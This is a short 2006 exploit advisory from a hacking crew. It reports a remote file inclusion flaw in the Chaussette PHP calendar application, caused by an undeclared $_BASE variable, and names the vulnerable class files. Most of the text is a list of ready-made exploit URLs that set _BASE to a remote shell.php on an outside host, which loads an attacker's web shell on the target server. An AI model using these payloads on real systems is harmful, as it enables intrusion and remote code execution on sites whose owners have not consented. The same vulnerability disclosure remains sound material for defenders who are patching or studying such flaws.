Rated as : High Risk
Chaussette Remote File Inclusion
CreW: ToXiC
Bug Found By Drago84
Source Code:
http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip
Page Affect
/Classes/Evenement.php
/Classes/Event.php
/Classes/Event_for_month.php
/Classes/Event_for_month_per_day.php
/Classes/Event_for_week.php
/Classes/My_Log.php
/Classes/My_Smarty.php
Problem Is :
$_BASE Not Declare;
ExP:
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php
Greatz: Str0ke
securitydot.net - 2006-08-10
|
